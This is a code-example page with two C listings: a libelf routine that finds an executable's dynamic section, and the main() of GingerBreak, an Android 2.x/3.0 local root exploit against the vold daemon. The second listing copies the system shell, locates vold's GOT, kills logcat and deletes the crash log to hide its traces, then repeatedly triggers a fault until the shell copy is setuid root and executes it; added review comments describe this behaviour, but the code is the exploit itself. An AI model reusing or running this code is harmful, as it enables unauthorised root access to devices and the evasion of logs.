コード例 #1
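/*
 * hook_pltgot - locate the dynamic section of @exename and hand its entries
 * to find_got().
 *
 * @exename: path of the executable image; opened read-only and parsed with
 *           libelf, never written.
 * @offset:  address to look up.  The p_vaddr of the first PT_LOAD segment is
 *           subtracted before it is passed to find_got(), i.e. it is turned
 *           into an offset relative to the image's load base (assumes the
 *           first PT_LOAD is the lowest-mapped segment — TODO confirm with
 *           find_got()'s expectations).
 *
 * Returns 0 on success, -1 if the file cannot be opened, if the image is
 * malformed, if a libelf call fails (its message is logged via pr_dbg), or
 * if find_got() reports failure for the dynamic section.
 */
int hook_pltgot(char *exename, unsigned long offset)
{
	int fd;
	int ret = -1;
	Elf *elf;
	GElf_Ehdr ehdr;
	Elf_Scn *sec;
	GElf_Shdr shdr;
	Elf_Data *data;
	size_t shstr_idx;
	size_t i;
	bool found = false;

	pr_dbg2("opening executable image: %s\n", exename);

	fd = open(exename, O_RDONLY);
	if (fd < 0)
		return -1;

	elf_version(EV_CURRENT);

	/* Map the file read-only; a NULL descriptor means libelf rejected it. */
	elf = elf_begin(fd, ELF_C_READ_MMAP, NULL);
	if (elf == NULL)
		goto elf_error;

	if (gelf_getehdr(elf, &ehdr) == NULL)
		goto elf_error;

	/*
	 * shstr_idx itself is not used below; the call is kept as a sanity
	 * check that the section header string table can be located.
	 */
	if (elf_getshdrstrndx(elf, &shstr_idx) < 0)
		goto elf_error;

	for (i = 0; i < ehdr.e_phnum; i++) {
		GElf_Phdr phdr;

		if (gelf_getphdr(elf, i, &phdr) == NULL)
			goto elf_error;

		/* Rebase @offset on the first loadable segment only once. */
		if (phdr.p_type == PT_LOAD && !found) {
			offset -= phdr.p_vaddr;
			found = true;
		}

		if (phdr.p_type != PT_DYNAMIC)
			continue;

		/* Find the section that covers the PT_DYNAMIC file offset. */
		sec = gelf_offscn(elf, phdr.p_offset);

		if (!sec || gelf_getshdr(sec, &shdr) == NULL)
			continue;

		/*
		 * The image comes from disk and is untrusted as far as this
		 * parser is concerned: a zero sh_entsize would make the entry
		 * count below divide by zero, so reject it explicitly instead
		 * of reporting a (stale) libelf error.
		 */
		if (shdr.sh_entsize == 0) {
			pr_dbg("invalid sh_entsize in dynamic section of %s\n", exename);
			goto out;
		}

		data = elf_getdata(sec, NULL);
		if (data == NULL)
			goto elf_error;

		if (find_got(data, shdr.sh_size / shdr.sh_entsize, offset) < 0)
			goto elf_error;
	}
	ret = 0;

out:
	/* elf_end() tolerates NULL, so the early elf_begin() failure lands here too. */
	elf_end(elf);
	close(fd);

	return ret;

elf_error:
	/* Log the last libelf error; ret is still -1 at this point. */
	pr_dbg("%s\n", elf_errmsg(elf_errno()));

	goto out;
}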
コード例 #2
ファイル: GingerBreak.c プロジェクト: 49degree/my-tel-util
/*
 * Entry point of the GingerBreak tool.  From an analysis point of view the
 * observable behaviour of this function is: it copies its own image and
 * /system/bin/sh to the paths in the file-scope globals bsh/sh, makes the
 * copy executable, selects a mode from the device's build properties, kills
 * the logcat process it relies on and unlinks its crash log, then repeatedly
 * calls do_fault() until the shell copy gains the setuid bit, at which point
 * it execve()s that copy.  The globals (sh, bsh, scale, honeycomb, froyo,
 * vold, logcat_pid, crashlog) and the helpers (do_root, copy, die, find_vold,
 * find_got, find_device, find_index, do_fault, last_try) are defined outside
 * this listing.
 *
 * Returns 0 only if execve() itself returns (i.e. fails); exits with 1 when
 * the setuid bit never appears.
 */
int main(int argc, char **argv, char **env)
{
	uint32_t i = 0, j = 0, idx = 0;
	char *ash[] = {sh, 0};
	struct stat st;
	char build_id[256], version_release[256];

	/*
	 * Re-entry path: when already running as root and invoked under a name
	 * containing "boomsh", hand off to do_root() (presumably the second
	 * stage started via the copied image — its body is not visible here).
	 */
	if (geteuid() == 0 && getuid() == 0 && strstr(argv[0], "boomsh"))
		do_root();

	printf("\n[**] Gingerbreak/Honeybomb -- android 2.[2,3], 3.0 softbreak\n");
	printf("[**] (C) 2010-2011 The Android Exploid Crew. All rights reserved.\n");
	printf("[**] Kudos to jenzi, the #brownpants-party, the Open Source folks,\n");
	printf("[**] Zynamics for ARM skills and Onkel Budi\n\n");
	printf("[**] donate to [email protected] if you like\n[**] Exploit may take a while!\n\n");

	/* Stage files: own image -> bsh, system shell -> sh.  Both paths are globals. */
	if (copy("/proc/self/exe", bsh) < 0 || copy("/system/bin/sh", sh) < 0)
		die("[-] Cannot copy boomsh.");

	chmod(bsh, 0711);   /* return value unchecked */

	printf("[+] start __system_property_get(\"ro.build.id\", build_id)\n");

	/* Read build properties into local buffers; the helper's write bound is
	 * not visible here — NOTE(review): buffers are 256 bytes, confirm that is
	 * at least the platform's property value limit. */
	__system_property_get("ro.build.id", build_id);
	printf("[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+]end __system_property_get(\"ro.build.id\", build_id)\n");
	__system_property_get("ro.build.version.release", version_release);

	printf("[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] end __system_property_get(\"ro.build.version.release\", version_release)\n");

	/* Mode selection by substring match on the build strings; sets globals. */
	if (strstr(build_id, "HONEY") || strstr(build_id, "Honey") || strstr(build_id, "honey") ||
	    strstr(version_release, "comb")) {
		printf("[+] Detected honeycomb! Starting honeybomb mode (scale=10).\n");
		scale = 10;
		honeycomb = 1;
	} else if (strstr(build_id, "FR") || strstr(build_id, "Fr") || strstr(build_id, "fr")) {
		printf("[+] Detected Froyo!\n");
		froyo = 1;
	} else
		printf("[+] Plain Gingerbread mode!\n");

	/* Target discovery; all three fill globals and return nothing checked here. */
	find_vold(&vold);
	find_got("/system/bin/vold");
	find_device();

	printf("[*] vold: %04d GOT start: 0x%08x GOT end: 0x%08x\n", vold.pid, vold.got_start,
	       vold.got_end);
	printf("[*] start find_index\n");
	idx = find_index();
	printf("[*] idx: %04d GOT idx\n", idx);
	/*
	 * Cleanup of the tool's own log capture: terminates the logcat process
	 * recorded in logcat_pid and removes the crash-log file named by
	 * crashlog.  Both are visible side effects worth noting for detection.
	 */
	kill(logcat_pid, SIGKILL);
	unlink(crashlog);
	printf("[*] _________________end unlink\n");
	/*
	 * Attempt loop: i walks downwards from idx, j counts attempts and bounds
	 * the loop by (got_end - got_start) — whether that difference is in bytes
	 * or entries is not visible here.  A failed do_fault() undoes both the
	 * index step and the attempt count.  Success is detected by the setuid
	 * bit (04000) appearing on the shell copy.
	 */
	for (i = idx; j++ < (vold.got_end - vold.got_start); --i) {
		if (do_fault(i, 0) < 0) {
			++i; --j;
			printf("[-] sendmsg() failed?\n");
			continue;
		}
		printf("[*] vold: %04d idx: %08d\n", vold.pid, -i); fflush(stdout);
		stat(sh, &st);   /* return value unchecked */
		if ((st.st_mode & 04000) == 04000) {
			printf("\n\n[!] dance forever my only one\n");
			break;
		}
	}

	/* Last try, sometimes vold cant handle 2 receives in the order
	 * we like by do_fault()
	 */
	/*
	 * NOTE(review): st is only written by the stat() inside the loop.  If no
	 * iteration reaches that stat() (e.g. every do_fault() fails, or the
	 * loop bound is zero), this reads an uninitialised struct — undefined
	 * behaviour.
	 */
	if ((st.st_mode & 04000) != 04000) {
		last_try(); last_try();
		stat(sh, &st);
		if ((st.st_mode & 04000) == 04000) {
			printf("\n[+] You are in luck! Last try succeeded!\n");
		} else {
			printf("\n[-] Bad luck. Fixed vold?\n");
			exit(1);
		}
	}

	/* Replace this process with the (now setuid) shell copy, keeping the
	 * caller's environment. */
	execve(*ash, ash, env);
	return 0;
}